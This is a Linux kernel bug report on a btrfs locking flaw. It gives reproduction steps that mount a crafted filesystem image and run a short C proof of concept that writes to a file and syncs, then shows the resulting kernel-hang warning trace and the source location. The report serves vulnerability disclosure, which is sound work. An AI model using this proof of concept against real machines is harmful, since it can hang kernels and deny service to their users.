Bug 200405

Created attachment 277169 [details]
The (compressed) crafted image which causes crash

- Reproduce
# mkdir mnt
# mount -t btrfs 6.img mnt
# gcc -o poc poc.c
# ./poc ./mnt

- POC (poc.c)
    #define _GNU_SOURCE
    #include <sys/types.h>
    #include <sys/mount.h>
    #include <sys/mman.h>
    #include <sys/stat.h>
    #include <sys/xattr.h>

    #include <dirent.h>
    #include <errno.h>
    #include <error.h>
    #include <fcntl.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    #include <linux/falloc.h>
    #include <linux/loop.h>

    static void activity(char *mpoint) {

      char *foo_bar_baz;
      int err;

      static int buf[8192];
      memset(buf, 0, sizeof(buf));

      err = asprintf(&foo_bar_baz, "%s/foo/bar/baz", mpoint);

      int fd = open(foo_bar_baz, O_RDWR | O_TRUNC, 0777);
      if (fd >= 0) { 
        write(fd, (char *)buf, 517); 
        write(fd, (char *)buf, sizeof(buf)); 
        fdatasync(fd);
        fsync(fd);
        close(fd); 
      }  
      
    }

    int main(int argc, char *argv[]) {
      activity(argv[1]);
      return 0;
    }

- Kernel message
Kernel hangs with the following dmesg
[  266.413453] BTRFS: device fsid 3381d111-94a3-4ac7-8f39-611bbbdab7e6 devid 1 transid 8 /dev/loop0
[  266.421264] BTRFS info (device loop0): disk space caching is enabled
[  266.421276] BTRFS info (device loop0): has skinny extents
[  278.113360] WARNING: CPU: 1 PID: 41 at fs/btrfs/locking.c:230 btrfs_tree_lock+0x3e2/0x400
[  278.113368] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd mac_hid i2c_piix4 soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper crct10dif_pclmul syscopyarea sysfillrect sysimgblt fb_sys_fops ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy
[  278.113737] CPU: 1 PID: 41 Comm: kworker/u4:1 Not tainted 4.18.0-rc1+ #8
[  278.113745] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  278.113753] Workqueue: btrfs-endio-write btrfs_endio_write_helper
[  278.113761] RIP: 0010:btrfs_tree_lock+0x3e2/0x400
[  278.113762] Code: 00 48 c7 40 08 00 00 00 00 48 8b 45 d0 65 48 33 04 25 28 00 00 00 75 20 48 81 c4 a0 00 00 00 5b 41 5c 41 5d 41 5e 41 5f 5d c3 <0f> 0b e9 d4 fc ff ff 0f 0b e9 61 ff ff ff e8 ab f4 87 ff 90 66 2e
[  278.113818] RSP: 0018:ffff8801f407f488 EFLAGS: 00010246
[  278.113828] RAX: 0000000000000000 RBX: ffff8801ef9cc6b8 RCX: ffffffffa584d87f
[  278.113831] RDX: 0000000000000003 RSI: dffffc0000000000 RDI: ffff8801f505d720
[  278.113834] RBP: ffff8801f407f550 R08: ffffed003de4cc0b R09: ffffed003de4cc0b
[  278.113837] R10: 0000000000000001 R11: ffffed003de4cc0a R12: ffff8801f505d280
[  278.113844] R13: 0000000000000029 R14: ffff8801ef266000 R15: ffff8801e0364200
[  278.113848] FS:  0000000000000000(0000) GS:ffff8801f6f00000(0000) knlGS:0000000000000000
[  278.113851] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  278.113854] CR2: 00000000006fcdf4 CR3: 00000001f0820000 CR4: 00000000000006e0
[  278.113865] Call Trace:
[  278.113876]  ? btrfs_tree_read_unlock_blocking+0xf0/0xf0
[  278.113900]  ? alloc_extent_buffer+0x85/0x4e0
[  278.113921]  ? btrfs_reserve_extent+0x1a9/0x280
[  278.113936]  btrfs_alloc_tree_block+0x39f/0x770
[  278.113942]  ? btrfs_reserve_extent+0x280/0x280
[  278.113972]  ? memcpy+0x45/0x50
[  278.113988]  __btrfs_cow_block+0x285/0x9e0
[  278.113995]  ? update_ref_for_cow+0x5e0/0x5e0
[  278.114008]  ? kasan_check_write+0x14/0x20
[  278.114014]  ? btrfs_tree_lock+0x39e/0x400
[  278.114019]  ? btrfs_tree_read_unlock_blocking+0x20/0xf0
[  278.114024]  ? kasan_check_write+0x14/0x20
[  278.114029]  btrfs_cow_block+0x191/0x2e0
[  278.114035]  btrfs_search_slot+0x492/0x1160
[  278.114040]  ? normal_work_helper+0xf6/0x500
[  278.114044]  ? btrfs_endio_write_helper+0x12/0x20
[  278.114076]  ? kthread+0x180/0x1d0
[  278.114114]  ? ret_from_fork+0x35/0x40
[  278.114120]  ? split_leaf+0xbf0/0xbf0
[  278.114124]  ? ret_from_fork+0x35/0x40
[  278.114137]  ? insert_delayed_ref+0xeb/0x450
[  278.114146]  btrfs_lookup_csum+0xec/0x280
[  278.114151]  ? truncate_one_csum+0x170/0x170
[  278.114154]  ? kasan_kmalloc+0x30/0xe0
[  278.114167]  ? memcg_kmem_put_cache+0x1b/0xa0
[  278.114173]  ? kmem_cache_alloc+0x17c/0x1e0
[  278.114177]  ? btrfs_alloc_path+0x26/0x30
[  278.114182]  btrfs_csum_file_blocks+0x2be/0xa60
[  278.114187]  ? kmem_cache_free+0x89/0x1e0
[  278.114192]  ? btrfs_del_csums+0x5c0/0x5c0
[  278.114199]  ? dio_read_error+0x700/0x700
[  278.114204]  ? join_transaction+0x16e/0x6a0
[  278.114208]  ? btrfs_record_root_in_trans+0x99/0xb0
[  278.114226]  ? rb_next+0x24/0x80
[  278.114232]  add_pending_csums+0xaf/0xf0
[  278.114238]  btrfs_finish_ordered_io+0x74b/0xc90
[  278.114244]  ? btrfs_unlink_subvol+0x890/0x890
[  278.114249]  ? kasan_check_write+0x14/0x20
[  278.114262]  ? finish_task_switch+0xec/0x340
[  278.114275]  ? put_prev_task_fair+0x3a/0x50
[  278.114281]  finish_ordered_fn+0x15/0x20
[  278.114285]  normal_work_helper+0xf6/0x500
[  278.114295]  ? read_word_at_a_time+0x12/0x20
[  278.114300]  ? strscpy+0xbd/0x1e0
[  278.114305]  btrfs_endio_write_helper+0x12/0x20
[  278.114310]  process_one_work+0x302/0x770
[  278.114315]  worker_thread+0x81/0x6d0
[  278.114321]  kthread+0x180/0x1d0
[  278.114325]  ? rescuer_thread+0x710/0x710
[  278.114330]  ? kthread_associate_blkcg+0x150/0x150
[  278.114334]  ret_from_fork+0x35/0x40
[  278.114339] ---[ end trace 2e85051acb5f6dc1 ]---

- Location
https://elixir.bootlin.com/linux/v4.18-rc3/source/fs/btrfs/locking.c#L230
	WARN_ON(eb->lock_owner == current->pid); <--
again:
	wait_event(eb->read_lock_wq, atomic_read(&eb->blocking_readers) == 0);
	wait_event(eb->write_lock_wq, atomic_read(&eb->blocking_writers) == 0);

Found by Wen Xu and Po-Ning Tseng from SSLab at Gatech.